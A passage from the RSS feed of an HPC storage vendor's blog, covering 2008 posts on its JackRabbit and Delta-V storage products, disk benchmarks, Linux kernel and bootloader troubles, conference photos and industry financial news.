      <guid>https://blog.scalability.org/2008/10/nominations-for-readers-choice-best-of-hpc-awards/</guid>
      <description>Linky here. I am not saying vote early and vote often. Just vote. This may be the most important election in our lifetimes &amp;hellip; er &amp;hellip; Anyone happy with theirJackRabbits, by all means, I encourage you to show your support.</description>
    </item>
    
    <item>
      <title>Evolving accelerator market</title>
      <link>https://blog.scalability.org/2008/10/evolving-accelerator-market/</link>
      <pubDate>Tue, 14 Oct 2008 23:12:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/evolving-accelerator-market/</guid>
      <description>I haven&amp;rsquo;t posted on accelerators in a while, and this will be short. I have posited that GPUs would basically win out in the accelerator wars, with possibly a distant second to something like Cell if enough of them could be made inexpensively available. My question now is, given the intent of Intel in this market, will Larrabee be able to get traction in the graphics world? And therefore, effectively displace nVidia (and to a lesser extent, AMD) as the accelerator king?</description>
    </item>
    
    <item>
      <title>Ouch</title>
      <link>https://blog.scalability.org/2008/10/ouch/</link>
      <pubDate>Tue, 14 Oct 2008 22:35:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/ouch/</guid>
      <description>Saw this on the beowulf list today regarding MD3000&amp;rsquo;s from Dell.
I hope this is not true. Jeff, can you chime in and tell me if this is real or not?</description>
    </item>
    
    <item>
      <title>Designed to fail ...</title>
      <link>https://blog.scalability.org/2008/10/designed-to-fail/</link>
      <pubDate>Tue, 14 Oct 2008 16:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/designed-to-fail/</guid>
      <description>So I wrote a post in anger, and deleted it. My apologies.
I have a saying I like to tell people: things that are designed to fail, often do. I run into this day in and day out. Bad cluster designs, bad storage designs, bad network designs. Poor choices in all of the above. I still can&amp;rsquo;t get over the two 128 port switches coupled together with a single gigabit uplink.</description>
    </item>
    
    <item>
      <title>Pictures from Ohio Linux Fest</title>
      <link>https://blog.scalability.org/2008/10/pictures-from-ohio-linux-fest/</link>
      <pubDate>Mon, 13 Oct 2008 17:34:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/pictures-from-ohio-linux-fest/</guid>
      <description>You can see us (and a ΔV) in all its glory &amp;hellip; here &amp;hellip; Me talking to someone:
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640887091893346)
I am the guy without so much hair (on his head), and black JackRabbit shirt, and the water in his right hand. Here is the &amp;ldquo;booth&amp;rdquo;
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640896772943522)
Here is a picture of Doug looking as tired as we both felt &amp;hellip;
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640900034994482)
But wait &amp;hellip; there&amp;rsquo;s more! we had a very nice &amp;hellip; I can&amp;rsquo;t say enough nice things about nVidia cards, nice nVidia card in our Cuda box, which we used to &amp;hellip; er &amp;hellip; run a desktop That was streaming something like 7 movies from ΔV while we were rotating a number of OpenInventor and WRL (VRML) models using the OpenInventor ivview.</description>
    </item>
    
    <item>
      <title>Reaction to ΔV</title>
      <link>https://blog.scalability.org/2008/10/reaction-to-%ce%b4v/</link>
      <pubDate>Sun, 12 Oct 2008 12:06:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/reaction-to-%ce%b4v/</guid>
      <description>We showed off a unit at the Ohio Linux Fest this past weekend. We had it streaming anywhere from 3-10 videos while doing lots of other things. Needless to say, the interest there was striking. We gathered a great deal of good feedback, as well as quite a few (hopeful) leads. I had set up apache2 to stream movies from the Internet Archive that I had pulled onto the machine for other tests.</description>
    </item>
    
    <item>
      <title>A peek within the ΔV kimono ...</title>
      <link>https://blog.scalability.org/2008/10/a-peek-within-the-v-kimono/</link>
      <pubDate>Tue, 07 Oct 2008 21:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/a-peek-within-the-v-kimono/</guid>
      <description>What you see below is from a $5400USD list price machine on initial run through, pre-tuning. Please remember that as you look at these numbers. This is less than $1USD per usable GB. Will be formally introduced/announced soon. You can see one live at ohiolinuxfest this weekend (this exact machine as it turns out). This is a RAID6 unit. We could go RAID5 and increase performance, though running in a configuration we do not recommend.</description>
    </item>
    
    <item>
      <title>Wrestling with insects ...</title>
      <link>https://blog.scalability.org/2008/10/wrestling-with-insects/</link>
      <pubDate>Tue, 07 Oct 2008 03:49:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/wrestling-with-insects/</guid>
      <description>&amp;hellip; DragonFly in this case. Turns out that I had a wrong database setting that nuked one of our major functions. It would run the code. It just wouldn&amp;rsquo;t return anything. Turns out this was due to a missing column (do&amp;rsquo;h!). How a column goes missing &amp;hellip; I dunno. Ok, we moved it from an old machine to a newer dedidcated machine. Maybe a column fell out of the bits when we trucked the data over.</description>
    </item>
    
    <item>
      <title>Cost of purchase for most HPC users</title>
      <link>https://blog.scalability.org/2008/10/cost-of-purchase-for-most-hpc-users/</link>
      <pubDate>Mon, 06 Oct 2008 17:14:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cost-of-purchase-for-most-hpc-users/</guid>
      <description>&amp;hellip; is the biggest non-sunk cost aspect for an HPC system, outside any software licensing costs, which have a habit of often dwarfing the system cost. At InsideHPC.com, John West does an analysis of the RedHat HPC announcement.
In a word, yes. It is very much an issue for the broader market. Remember, HPC at the top, is shrinking in relative terms as a fraction of the HPC market. I haven&amp;rsquo;t looked at the numbers recently, but it wouldn&amp;rsquo;t surprise me to see an absolute shrinkage as well.</description>
    </item>
    
    <item>
      <title>No, I did not have this in mind when we named the product ...</title>
      <link>https://blog.scalability.org/2008/10/no-i-did-not-have-this-in-mind-when-we-named-the-product/</link>
      <pubDate>Mon, 06 Oct 2008 00:33:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/no-i-did-not-have-this-in-mind-when-we-named-the-product/</guid>
      <description>JackRabbit that is &amp;hellip; And now for something completely different. A bunny with a mean streak, a mile wide &amp;hellip;</description>
    </item>
    
    <item>
      <title>Public Mercurial projects up</title>
      <link>https://blog.scalability.org/2008/10/public-mercurial-projects-up/</link>
      <pubDate>Mon, 06 Oct 2008 00:07:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/public-mercurial-projects-up/</guid>
      <description>Took me way too long to get these up. Our open source tools will be hosted here. Right now, simple tools like ifinfo, and bbs are up. Our public SGEtools will show up soon. Older releases of our finishing scripts will find the way there as well. We are deciding upon which other tools we will release this way. Please stay tuned.</description>
    </item>
    
    <item>
      <title>on &#34;broken&#34; OS installers ... well on the software that the OS installers depend upon ...</title>
      <link>https://blog.scalability.org/2008/10/on-broken-os-installers-well-on-the-software-that-the-os-installers-depend-upon/</link>
      <pubDate>Sun, 05 Oct 2008 00:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/on-broken-os-installers-well-on-the-software-that-the-os-installers-depend-upon/</guid>
      <description>Working out issues with the installation of an OS onto a CF device. Odd situation. OS installs all the way. Upon reboot, whammo, not enough grub to do more than print a message saying something to the effect of &amp;ldquo;you are hosed&amp;rdquo;. This is OpenSuSE 10.3 for a JackRabbit flying out the door tuesday morning. Earlier if possible.
Turns out that this wasn&amp;rsquo;t confined to SuSE. A number of the other distros did the same thing.</description>
    </item>
    
    <item>
      <title>Delta-V is coming</title>
      <link>https://blog.scalability.org/2008/10/delta-v-is-coming/</link>
      <pubDate>Thu, 02 Oct 2008 04:15:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/delta-v-is-coming/</guid>
      <description>Will be showing a unit at OhioLinuxFest in Columbus late next week. Think &amp;hellip; less expensive than JackRabbit, and not as fast, though still pretty fast. This unit can scale down in performance and price, as well as up, to 36 TB per unit. Management via a web and cli interface. Price points are completely insane. Some very neat features &amp;hellip; more soon. I promise.</description>
    </item>
    
    <item>
      <title>... and it seems no fuzzy orange dice at SC this year</title>
      <link>https://blog.scalability.org/2008/10/and-it-seems-no-fuzzy-orange-dice-at-sc-this-year/</link>
      <pubDate>Thu, 02 Oct 2008 04:08:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-it-seems-no-fuzzy-orange-dice-at-sc-this-year/</guid>
      <description>Yup, you got it. YottaYotta is no more. Storage is a tough game.</description>
    </item>
    
    <item>
      <title>... and HP gobbles up Lefthand networks</title>
      <link>https://blog.scalability.org/2008/10/and-hp-gobbles-up-lefthand-networks/</link>
      <pubDate>Thu, 02 Oct 2008 00:30:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-hp-gobbles-up-lefthand-networks/</guid>
      <description>From WSJ:
Uh huh. Competition for Equalogic.</description>
    </item>
    
    <item>
      <title>Cheapskates?  Nah... really?</title>
      <link>https://blog.scalability.org/2008/09/cheapskates-nah-really/</link>
      <pubDate>Tue, 30 Sep 2008 14:26:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/cheapskates-nah-really/</guid>
      <description>John West at InsideHPC.com points to an article on fault tolerant servers and the push to get them into HPC systems. One of the key soundbites is something John feeds up
Well, that is one way of looking at it &amp;hellip;
It is arguably more correct to point out that cycles are cycles, and clusters offered an opportunity to massively expand lower cost cycles. Calling Supercomputing folks &amp;ldquo;cheapskates&amp;rdquo; isn&amp;rsquo;t likely to win you friends there.</description>
    </item>
    
    <item>
      <title>... and the market reacts ...</title>
      <link>https://blog.scalability.org/2008/09/and-the-market-reacts/</link>
      <pubDate>Mon, 29 Sep 2008 18:50:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/and-the-market-reacts/</guid>
      <description>5.56% of value wiped off the books. Right now we are at 10,523.07 on NYSE. 6.9% drop on NASDAQ. S&amp;amp;P; 500 is down 7.05% All this just today. Folks, this is about to get bumpy. 5% of market value just evaporated. Thats $50B of each $1T of market cap. A billion here, a billion there, and pretty soon we are talking about real money.
Tech got whalloped. Our partners at Wipro had a 10% decline.</description>
    </item>
    
    <item>
      <title>wondering aloud ...</title>
      <link>https://blog.scalability.org/2008/09/wondering-aloud/</link>
      <pubDate>Sun, 28 Sep 2008 13:24:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/wondering-aloud/</guid>
      <description>&amp;hellip; if the fluctuation-dissipation theorem holds for what we are seeing in the economic state. Basically this theorem describes the power spectrum of the Fourier transform of a particular state variable in an system at or near equilibrium subject to external driving forces. That is, it helps you figure out where most of the driving force behind observed changes in that state variable are, while measuring the dissipation or irretrievable loss of energy in the system.</description>
    </item>
    
    <item>
      <title>Thoughts on the impact of the credit market meltdown on HPC</title>
      <link>https://blog.scalability.org/2008/09/thoughts-on-the-impact-of-the-credit-market-meltdown-on-hpc/</link>
      <pubDate>Sat, 27 Sep 2008 22:47:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/thoughts-on-the-impact-of-the-credit-market-meltdown-on-hpc/</guid>
      <description>It remains to be seen if this is happening, but &amp;hellip; Along comes company X, who wants to buy a large HPC system. They call up company Y, and asks them to build a system design and quote for them. Off Y goes, works through everything, gets updated pricing. They notice that all their T&amp;amp;C; from their suppliers are suddenly Net-cash terms. Basically buy it, but pay with a credit card or other immediate instrument.</description>
    </item>
    
    <item>
      <title>SGI releases 2nd quarter results</title>
      <link>https://blog.scalability.org/2008/09/sgi-releases-2nd-quarter-results/</link>
      <pubDate>Sat, 27 Sep 2008 15:27:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sgi-releases-2nd-quarter-results/</guid>
      <description>You can see them here. $93,8M revenue, $29.5M gross profit. COGS of $64.4M. OPEX of $58.1M. Operating profit (loss) is $29.5M - $58.1M or -$28.6M (or for the accounting types with us ($28.6M) ). When they are done with the rest of accounting, their net income is ($35.1M) or -$35.1M. This is a net loss, but it is lower than previous net losses by $4.6M. Their revenue increased $14.8M or so.</description>
    </item>
    
    <item>
      <title>CSD in restructuring to reduce costs</title>
      <link>https://blog.scalability.org/2008/09/csd-in-restructuring-to-reduce-costs/</link>
      <pubDate>Sat, 27 Sep 2008 14:45:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/csd-in-restructuring-to-reduce-costs/</guid>
      <description>I wasn&amp;rsquo;t aware of it until Doug pointed it out in our comment section. Short version, Clearspeed is in significant cost reduction mode right now. Reducing R&amp;amp;D; to fulfill existing orders, reducing cost structures, etc. My follow-on comment addressed the interim results. You can see their share price versus time here on Yahoo. The decline looks like a straight line on a logarithmic graph. A long tail. Not quite the same as what the VCs like.</description>
    </item>
    
    <item>
      <title>Mention of JackRabbit in use at Wirth</title>
      <link>https://blog.scalability.org/2008/09/mention-of-jackrabbit-in-use-at-wirth/</link>
      <pubDate>Wed, 24 Sep 2008 16:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/mention-of-jackrabbit-in-use-at-wirth/</guid>
      <description>See this article on HPCwire (and another on SupercomputingOnline). Last month was one of our best JackRabbit months ever. In this market, with IT management under pressure to deliver better faster high performance storage service for less money, the case for JackRabbit is compelling. More soon though. I promise!</description>
    </item>
    
    <item>
      <title>when you&#39;re busy ... you really are busy ...</title>
      <link>https://blog.scalability.org/2008/09/when-youre-busy-you-really-are-busy/</link>
      <pubDate>Wed, 24 Sep 2008 15:53:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/when-youre-busy-you-really-are-busy/</guid>
      <description>Lots of new things, so little time. My apologies. Will update soon. I promise.</description>
    </item>
    
    <item>
      <title>Unwelcome surprises</title>
      <link>https://blog.scalability.org/2008/09/unwelcome-surprises/</link>
      <pubDate>Thu, 18 Sep 2008 03:31:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/unwelcome-surprises/</guid>
      <description>There I am, working on an RFP response. Figuring our partner needs this in word format, the laptop is booted into windows xp. Word 2003 is up. Several hours worth of work. Saved often. Oh, you already know where this is going?
Yeah. Its going there. Crash goes word. Starts complaining it can&amp;rsquo;t read the disk. Never mind that it appears to be able to read the disk just fine in another window.</description>
    </item>
    
    <item>
      <title>A nice loading test</title>
      <link>https://blog.scalability.org/2008/09/a-nice-loading-test/</link>
      <pubDate>Sun, 14 Sep 2008 23:23:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/a-nice-loading-test/</guid>
      <description>A customer presented a nice test to us. We thought we had a good loading program going, running the units at heavy load for extended lengths of time. And these are good loading programs. But they weren&amp;rsquo;t as intensive as this customers. They run 8 bonnie++ jobs simultaneously on the system. So we ran it. And promptly crashed the unit.
Believe it or not, that was good. In the process we exposed a corner case where the later rev driver and updated firmware had a crash relative to the previous driver release with the same firmware.</description>
    </item>
    
    <item>
      <title>Linux kernel 2.6.26.5 is buggy, 2.6.27-rc6 works</title>
      <link>https://blog.scalability.org/2008/09/linux-kernel-26265-is-buggy-2627-rc6-works/</link>
      <pubDate>Sun, 14 Sep 2008 16:29:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/linux-kernel-26265-is-buggy-2627-rc6-works/</guid>
      <description>Alrighty. Been struggling to get an operational 2.6.26.5 kernel working for a customer. This is supposed to be the next generation of our supported kernels, replacing the now aging 2.6.23.14 kernel (you think ours is old? look at RHELs). It works fine on a Ubuntu system. All the things we needed built it, do in fact, work. The problem was the immediate kernel panic on a RHEL5.2 system. 11 seconds in, it couldn&amp;rsquo;t find /dev/root (the root directory).</description>
    </item>
    
    <item>
      <title>finally, I can point to a comparison someone else ran</title>
      <link>https://blog.scalability.org/2008/09/finally-i-can-point-to-a-comparison-someone-else-ran/</link>
      <pubDate>Sun, 14 Sep 2008 15:58:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/finally-i-can-point-to-a-comparison-someone-else-ran/</guid>
      <description>Have a look at this:
 root@cisd-ruapehu # time dd if=/dev/zero of=80G bs=8192k count=10000 10000+0 records in 10000+0 records out real 2m41.484s user 0m0.064s sys 2m26.890s   Quick calculation. This is a 44 disk raidz2 striped in the &amp;ldquo;optimal&amp;rdquo; manner according to the guide quoted. This is roughly 80GB in 161 seconds. Or, 0.497 GB/s. Under 500 GB/s. Yup. They show off their blazing 560 MB/s performance on smaller (mostly cached 16GB system ram 20GB file) files.</description>
    </item>
    
    <item>
      <title>SGI late with financial filings</title>
      <link>https://blog.scalability.org/2008/09/sgi-late-with-financial-filings/</link>
      <pubDate>Fri, 12 Sep 2008 23:42:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sgi-late-with-financial-filings/</guid>
      <description>Mercury news blog reports that SGI has told the SEC that it will be late in filing its financials for the quarter. Specifically
Read the full article, don&amp;rsquo;t jump to conclusions from this snippet. This said, I have as of yet to see any company say &amp;ldquo;hey we are gonna be late&amp;rdquo; and &amp;ldquo;wow, we just found this bucket of money in the corner!&amp;rdquo;. It is usually more along the lines of &amp;ldquo;oh, we have to pay that bill too?</description>
    </item>
    
    <item>
      <title>The impact of self-righteous decisions upon the real world: a simple case study</title>
      <link>https://blog.scalability.org/2008/09/the-impact-of-self-righteous-decisions-upon-the-real-world-a-simple-case-study/</link>
      <pubDate>Thu, 11 Sep 2008 20:44:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/the-impact-of-self-righteous-decisions-upon-the-real-world-a-simple-case-study/</guid>
      <description>Firefox 3 makes great hay over how much happier they are for their security bits. Especially their seemingly deeply thought out position on not allowing self signed certificates to be used easily on the web. Cudos to them for their stance. One &amp;hellip; well &amp;hellip; not so small &amp;hellip; problem. It breaks things. No, I am not arguing whether or not self-signed is good or bad. It breaks things you can&amp;rsquo;t possibly fix.</description>
    </item>
    
    <item>
      <title>The time implications of storage size</title>
      <link>https://blog.scalability.org/2008/09/the-time-implications-of-storage-size/</link>
      <pubDate>Wed, 10 Sep 2008 01:14:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/the-time-implications-of-storage-size/</guid>
      <description>I&amp;rsquo;ve been writing and talking about data motion as a pain point for a while. To drive this home, have a look at this site. This provides a snapshot into how much bandwidth a technology provides, and what the implications are for (best case) data motion over time. Since data motion isn&amp;rsquo;t getting any easier, a few thoughts emerge from this.
First, as we gather ever more data, this data is going to reside at static locations &amp;hellip; the cost of moving it is large over the network.</description>
    </item>
    
    <item>
      <title>updated bonnie&#43;&#43; for JackRabbit-M</title>
      <link>https://blog.scalability.org/2008/09/updated-bonnie-for-jackrabbit-m/</link>
      <pubDate>Mon, 08 Sep 2008 04:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/updated-bonnie-for-jackrabbit-m/</guid>
      <description>[root@jackrabbitm sbin]# bonnie++ -u root -d /big -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jackrabbitm 129112M 707695 51 153242 17 1143371 73 452.</description>
    </item>
    
    <item>
      <title>Observations on kernel stability</title>
      <link>https://blog.scalability.org/2008/09/observations-on-kernel-stability/</link>
      <pubDate>Sat, 06 Sep 2008 15:50:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/observations-on-kernel-stability/</guid>
      <description>There is just no nice way to say this. We have a real (serious) concern over the stability of the baseline Redhat/SuSE kernels on newer hardware. Not just our JackRabbit systems (and our forthcoming ΔV systems), but clusters of newer gear, newer servers, etc. We install baseline systems, using nothing but the baseline components, perform the recommended upgrades. Place these systems under moderate load, and whamo &amp;hellip; kernel panic. Replace their kernel with our 2.</description>
    </item>
    
    <item>
      <title>Evolution of sales models in a changing economy</title>
      <link>https://blog.scalability.org/2008/09/evolution-of-sales-models-in-a-changing-economy/</link>
      <pubDate>Sat, 06 Sep 2008 13:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/evolution-of-sales-models-in-a-changing-economy/</guid>
      <description>Short note. For many years, large computing companies have fielded large sales forces, and large reseller forces to provide more sales firepower to their revenue generation efforts. These require personal interaction to buy something. Sun has recently decided to go almost all reseller. Feedback from some of our mutual customers indicates that some customers don&amp;rsquo;t like this. The flip side is that large sales forces require large expenditures of capital &amp;hellip; people cost money to hire.</description>
    </item>
    
    <item>
      <title>why do I bang my head against this wall?</title>
      <link>https://blog.scalability.org/2008/09/why-do-i-bang-my-head-against-this-wall/</link>
      <pubDate>Thu, 04 Sep 2008 16:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/why-do-i-bang-my-head-against-this-wall/</guid>
      <description>&amp;hellip; because it fees so good when I stop. Or so goes the old joke. A long while ago, I mentioned we have a customer who self-inflicts pain by spending too much time using root for day to day work. We advise against this. No good can possibly come of this, only bad. Like the last time when a key-logger grabbed the root password as some windows user was typing it in.</description>
    </item>
    
    <item>
      <title>Blue waters are a-movin...</title>
      <link>https://blog.scalability.org/2008/09/blue-waters-are-a-movin/</link>
      <pubDate>Wed, 03 Sep 2008 22:39:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/blue-waters-are-a-movin/</guid>
      <description>NSF is funding a 2x10^5 processor monster machine at NCSA. At $208M, each dollar will by you 4.8 MFLOP (4.8x10^6 FLOP). Hmmm&amp;hellip;. Assuming a quad core CPU would be able to provide (in theory) 32 GFLOP (4 cores x 8 GFLOP/core), you would need 31,250 units to provide this &amp;hellip; (125000 cores). There are some interesting things about this machine. Very interesting &amp;hellip; not just the price tag or the estimated sustainable performance</description>
    </item>
    
    <item>
      <title>[sigh ....]</title>
      <link>https://blog.scalability.org/2008/09/sigh/</link>
      <pubDate>Wed, 03 Sep 2008 19:53:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sigh/</guid>
      <description>New unit being built for another customer [JackRabbit orders are multiplying like bunnies]
[root@jackrabbitm ~]# dd if=/big/big.file of=/dev/null ... 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 51.8149 seconds, 1.6 GB/s [root@jackrabbitm ~]# cat /proc/meminfo | grep MemTotal MemTotal: 33011556 kB  Yes. We did just stream a file more than 2x the size of ram (32 GB) from disk. Yes, it sustained 1.62 GB/s. Yes. We did this with 24 disks.</description>
    </item>
    
    <item>
      <title>Interesting observations on performance focus</title>
      <link>https://blog.scalability.org/2008/09/interesting-observations-on-performance-focus/</link>
      <pubDate>Tue, 02 Sep 2008 03:27:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/interesting-observations-on-performance-focus/</guid>
      <description>Again, on the excellent InsideHPC.com blog, John West points to a blog at Intel with an interesting observation:
I would add to this that we have research computer users who prefer the expressiveness of languages such as Matlab, often ignoring the huge performance penalty for using such languages. The value to them is the ease of writing/maintaining their &amp;ldquo;code&amp;rdquo;. Tools such as ISC&amp;rsquo;s StarP attempt to build compiled code from the Matlab code.</description>
    </item>
    
    <item>
      <title>humongous computing systems</title>
      <link>https://blog.scalability.org/2008/09/humongous-computing-systems/</link>
      <pubDate>Tue, 02 Sep 2008 01:43:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/humongous-computing-systems/</guid>
      <description>Again, John West reads more than I, and notes at InsideHPC.com blog, an article from Doug Eadline on Linux Magazine, all about really big clusters. These are subjects I have explored a number of times. Doug points to nature and how nature scales and isolates failure.
This also reminds me of the multiple types of networks that can be formed for computation/processing. One that I deal with every now and then are the spammers, and their bot-nets.</description>
    </item>
    
    <item>
      <title>InsideHPC on SGI results, and thoughts on industry trends</title>
      <link>https://blog.scalability.org/2008/09/insidehpc-on-sgi-results-and-thoughts-on-industry-trends/</link>
      <pubDate>Tue, 02 Sep 2008 01:03:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/insidehpc-on-sgi-results-and-thoughts-on-industry-trends/</guid>
      <description>John West at the excellent InsideHPC.com blog points out in a short note that
A number of obvious points about this &amp;hellip; the economy has been under pressure. Customers have been buying less. SGI reports that revenue has increased to $93.9M from $79.1M in the third quarter. How much of this is normal seasonal variance (government purchase cycles) versus an actual increase in bookings (e.g. new deals that haven&amp;rsquo;t been worked on for a while).</description>
    </item>
    
    <item>
      <title>echos ...</title>
      <link>https://blog.scalability.org/2008/09/echos/</link>
      <pubDate>Mon, 01 Sep 2008 22:52:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/echos/</guid>
      <description>I don&amp;rsquo;t mind tearing into bad implementations of an idea or product. If the thing isn&amp;rsquo;t good, criticism can help focus where it needs to improve. The trouble with this is when the criticism arrives too late, or is rejected out of hand by those who would benefit most. No, not being self righteous. I am just as critical of our stuff, our products and mis-steps as I am of others.</description>
    </item>
    
    <item>
      <title>Sadness ... but understandable</title>
      <link>https://blog.scalability.org/2008/08/sadness-but-understandable/</link>
      <pubDate>Thu, 28 Aug 2008 22:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/sadness-but-understandable/</guid>
      <description>[optical communications/.](http://slashdot.org) reports ona wired story which covers the demise of fundamental physics research at Bell labs. For those who aren&amp;rsquo;t aware, your ability to read this on your electronic device is directly as a result of fundamental physics research at Bell Labs. The vast majority of computers these days are based upon transistors. Which was invented at Bell Labs. Yeah, you might say &amp;ldquo;so what&amp;rdquo;. Curiousity driven research can sometimes pay back in a big way.</description>
    </item>
    
    <item>
      <title>banging my head against ... grub .... grrrr</title>
      <link>https://blog.scalability.org/2008/08/banging-my-head-against-grub-grrrr/</link>
      <pubDate>Tue, 26 Aug 2008 02:29:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/banging-my-head-against-grub-grrrr/</guid>
      <description>So we had loaded two pretty darn nearly identical JackRabbitsландшафт for delivery to a customer tomorrow. As part of the load, we want serial consoles available in case we need emergency access. Plug it in and solve problems. Great. Remember, these are virtually identical machines. Same MB, same CPU, same rev (one has more cores/twice the memory of the other used for disk to disk backups). Same bios, same bios settings.</description>
    </item>
    
    <item>
      <title>Fun monday morning benchmarking</title>
      <link>https://blog.scalability.org/2008/08/fun-monday-morning-benchmarking/</link>
      <pubDate>Mon, 25 Aug 2008 11:50:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/fun-monday-morning-benchmarking/</guid>
      <description>Running NCBI BLAST on the JackRabbit we are preparing for shipment. Used the nt database from last july (21 GB in size, 5+M sequences). Our a. thaliana had 1164 sequences, and about 500k letters. Took 8m 44s to BLAST these sequences against this database. This means about 2.1838e+13 cell updates per second. This is the product of the number of letters in the database and the sequence under test divided by the total wall clock time.</description>
    </item>
    
    <item>
      <title>while we are at it ...</title>
      <link>https://blog.scalability.org/2008/08/while-we-are-at-it/</link>
      <pubDate>Sun, 24 Aug 2008 17:04:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/while-we-are-at-it/</guid>
      <description>a newshort benchmark writeup for JackRabbit for On-Demand Media Service. Quite cool. Our results were amazing.</description>
    </item>
    
    <item>
      <title>Its up! [our online store]</title>
      <link>https://blog.scalability.org/2008/08/its-up-our-online-store/</link>
      <pubDate>Sun, 24 Aug 2008 15:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/its-up-our-online-store/</guid>
      <description>Took us long enough&amp;hellip; Now you can buy your JackRabbit high performance storage systems online. Just click here &amp;hellip; Not everything is on the store, but we are moving to get the items up quickly. Nothing quite like buying Gigabytes/s while wearing bunny slippers ...</description>
    </item>
    
    <item>
      <title>Our customers are not crash dummies ...</title>
      <link>https://blog.scalability.org/2008/08/our-customers-are-not-crash-dummies/</link>
      <pubDate>Sun, 24 Aug 2008 11:54:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/our-customers-are-not-crash-dummies/</guid>
      <description>&amp;hellip; and we don&amp;rsquo;t treat them like such. This is the gist of a conversation we had over the weekend. A JackRabbit unit running Centos 5.2 going out to a customer in the financial services space, required firmware updates for some of its components. It would have been simply too easy for us to do what many of our competitors do, and ship them a firmware/driver update on a CD or USB stick, or point them to a login for downloading the bits.</description>
    </item>
    
    <item>
      <title>multiple job opportunities</title>
      <link>https://blog.scalability.org/2008/08/multiple-job-opportunities/</link>
      <pubDate>Sat, 23 Aug 2008 12:18:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/multiple-job-opportunities/</guid>
      <description>OT to our usual fare. The day job has a few possible openings for high performance computing technical types. Positions would be in Michigan, and one would have some extended travel. Please contact me if you would like to talk.</description>
    </item>
    
    <item>
      <title>An interesting correlation</title>
      <link>https://blog.scalability.org/2008/08/an-interesting-correlation/</link>
      <pubDate>Wed, 20 Aug 2008 15:50:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/an-interesting-correlation/</guid>
      <description>Whenever a post somehow critical of zfs or Sun shows up on the blog or in an email to a list, within a few hours, someone starts email-bombing us. Hmmmm&amp;hellip;&amp;hellip;&amp;hellip;. Correlations do not imply causality. But they are damn suspicious. Update: I should also note that someone took the time to even try to subscribe me to several mailing lists. Wow. The value of this is &amp;hellip;. what?</description>
    </item>
    
    <item>
      <title>apologies for slow posting ... we have been busy</title>
      <link>https://blog.scalability.org/2008/08/apologies-for-slow-posting-we-have-been-busy/</link>
      <pubDate>Tue, 19 Aug 2008 12:16:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/apologies-for-slow-posting-we-have-been-busy/</guid>
      <description>many things going on &amp;hellip; busiest JackRabbit month on record. We moved into a new facility, migrated servers, setup a new phone system, setup a new lab, started the online store (still not complete, but ready to take initial orders!), &amp;hellip; yadda yadda yadda. I won&amp;rsquo;t say JackRabbits are flying off shelves &amp;hellip; though I could say they are hopping off them (JackRabbits don&amp;rsquo;t have wings after all).</description>
    </item>
    
    <item>
      <title>Rackable buys TerraScale and now dumps TerraScale</title>
